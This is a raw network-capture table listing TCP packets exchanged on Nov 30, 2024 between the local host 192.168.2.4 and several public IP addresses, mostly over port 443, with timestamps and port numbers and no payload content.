                                                                                        Nov 30, 2024 12:47:07.192272902 CET44349736104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:07.192334890 CET49736443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:07.192338943 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:07.192768097 CET49736443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:07.192781925 CET44349736104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:07.193516970 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:07.193538904 CET44349735104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.406563044 CET44349735104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.407139063 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.407177925 CET44349735104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.408314943 CET44349735104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.408384085 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.410732985 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.410794973 CET44349735104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.410931110 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.410959959 CET44349735104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.411082983 CET44349735104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.411092997 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.411117077 CET44349735104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.411143064 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.411143064 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.411180019 CET49735443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.411377907 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.411405087 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.411463976 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.411891937 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.411906004 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.447664976 CET44349736104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.447999954 CET49736443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.448028088 CET44349736104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.449227095 CET44349736104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.449291945 CET49736443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.449626923 CET49736443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.449642897 CET49736443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.449687004 CET44349736104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.449707031 CET49736443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.449748993 CET49736443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.450050116 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.450088024 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:08.450170040 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.450344086 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:08.450364113 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.664957047 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.667160988 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:09.667177916 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.668087959 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.668155909 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:09.671000004 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:09.671057940 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.671348095 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:09.671355963 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.715658903 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.715925932 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:09.715939999 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.716890097 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.716955900 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:09.717329025 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:09.717385054 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.720845938 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:09.767489910 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:09.767502069 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:09.814017057 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:10.481321096 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:10.481401920 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:10.481466055 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:10.676619053 CET49740443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:10.676651955 CET44349740104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:10.716856003 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:10.759324074 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.410944939 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.410979986 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.411016941 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:11.411022902 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.411032915 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.411072016 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:11.411077023 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.411113977 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:11.414405107 CET49739443192.168.2.4104.21.82.93
                                                                                        Nov 30, 2024 12:47:11.414423943 CET44349739104.21.82.93192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.424031019 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:11.424052000 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.424108028 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:11.424391985 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:11.424407005 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.636624098 CET49743443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:11.636674881 CET44349743172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.636773109 CET49743443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:11.644315958 CET49743443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:11.644330025 CET44349743172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.681752920 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:11.681793928 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:11.681977034 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:11.684863091 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:11.684881926 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:12.900573969 CET44349743172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:12.900996923 CET49743443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:12.901022911 CET44349743172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:12.902046919 CET44349743172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:12.902108908 CET49743443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:12.902642012 CET49743443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:12.902657032 CET49743443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:12.902709961 CET44349743172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:12.902715921 CET49743443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:12.902755976 CET49743443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:12.903326988 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:12.903347969 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:12.903414011 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:12.903764963 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:12.903779984 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.116549015 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.116620064 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.149144888 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.149187088 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.149463892 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.166623116 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.203388929 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.219131947 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:13.223242998 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:13.223252058 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.224278927 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.224292040 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.224344015 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:13.243998051 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:13.244106054 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.283488989 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.297091007 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:13.297101974 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.327343941 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.339719057 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:13.713763952 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.713834047 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.714037895 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.714037895 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.714097023 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.714133024 CET49744443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.714153051 CET4434974423.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.754647017 CET49746443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.754693031 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:13.754935980 CET49746443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.755218029 CET49746443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:13.755247116 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.161133051 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.161391020 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:14.161405087 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.162401915 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.162463903 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:14.162822008 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:14.162883043 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.163047075 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:14.163054943 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.203356981 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:14.615662098 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.615714073 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.615756989 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:14.615767956 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.615837097 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:14.616027117 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:14.617291927 CET49745443192.168.2.4172.67.167.249
                                                                                        Nov 30, 2024 12:47:14.617302895 CET44349745172.67.167.249192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.225421906 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.225512028 CET49746443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:15.227291107 CET49746443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:15.227308989 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.227560997 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.228831053 CET49746443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:15.271347046 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.582602978 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:15.582623005 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.582808018 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:15.584300995 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:15.584315062 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.763350964 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.763427973 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.763926983 CET49746443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:15.788351059 CET49746443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:15.788400888 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:15.788430929 CET49746443192.168.2.423.218.208.109
                                                                                        Nov 30, 2024 12:47:15.788448095 CET4434974623.218.208.109192.168.2.4
                                                                                        Nov 30, 2024 12:47:17.307399035 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:17.307467937 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:17.314165115 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:17.314174891 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:17.314439058 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:17.359566927 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:18.796000004 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:18.839371920 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:19.367014885 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:19.367043018 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:19.367049932 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:19.367125988 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:19.367125988 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:19.367160082 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:19.367170095 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:19.367182016 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:19.367194891 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:19.367218018 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:19.389357090 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:19.389444113 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:19.389446020 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:19.389488935 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:20.890191078 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:20.890206099 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:20.890219927 CET49747443192.168.2.4172.202.163.200
                                                                                        Nov 30, 2024 12:47:20.890224934 CET44349747172.202.163.200192.168.2.4
                                                                                        Nov 30, 2024 12:47:22.850013018 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:22.850065947 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:22.850222111 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:23.046277046 CET4972380192.168.2.42.20.68.201
                                                                                        Nov 30, 2024 12:47:23.158193111 CET49742443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:47:23.158207893 CET44349742142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:47:23.167355061 CET80497232.20.68.201192.168.2.4
                                                                                        Nov 30, 2024 12:47:23.167426109 CET4972380192.168.2.42.20.68.201
                                                                                        Nov 30, 2024 12:47:57.280383110 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:57.280405045 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:57.280503035 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:57.280807018 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:57.280821085 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:57.406759024 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:57.406804085 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:57.406877041 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:57.407217026 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:57.407227993 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.027820110 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.027915001 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:59.032278061 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:59.032288074 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.032516956 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.040817022 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:59.063882113 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.063977003 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.065411091 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.065422058 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.065660954 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.074378967 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.087337017 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.115339041 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.549285889 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.549307108 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.549320936 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.549407959 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.549424887 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.549474955 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.682374954 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.682399988 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.682415962 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.682493925 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:59.682513952 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.682560921 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:59.722652912 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.722697020 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.722739935 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.722806931 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:59.722917080 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:59.723182917 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:59.723201990 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.723237038 CET49754443192.168.2.420.12.23.50
                                                                                        Nov 30, 2024 12:47:59.723242998 CET4434975420.12.23.50192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.744122028 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.744165897 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.744230032 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.744245052 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.744276047 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.744282961 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.787859917 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.787874937 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.787960052 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.787966967 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.788003922 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.925498962 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.925515890 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.925565958 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.925574064 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.925591946 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.925781965 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.964799881 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.964814901 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.964881897 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.964889050 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.964941025 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.983403921 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.983422041 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.983469009 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.983474016 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:47:59.983506918 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:47:59.983519077 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.004930019 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.004944086 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.005018950 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.005024910 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.005067110 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.119343996 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.119359016 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.119429111 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.119437933 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.119482994 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.137561083 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.137574911 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.137646914 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.137653112 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.137693882 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.152096033 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.152120113 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.152177095 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.152183056 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.152221918 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.168970108 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.168984890 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.169032097 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.169035912 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.169075966 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.184828997 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.184843063 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.184920073 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.184926033 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.184966087 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.201750994 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.201764107 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.201847076 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.201852083 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.201889038 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.206619978 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.206671953 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.206679106 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.206716061 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.206803083 CET49753443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:00.206811905 CET4434975313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:00.206821918 CET49753443192.168.2.413.107.246.63
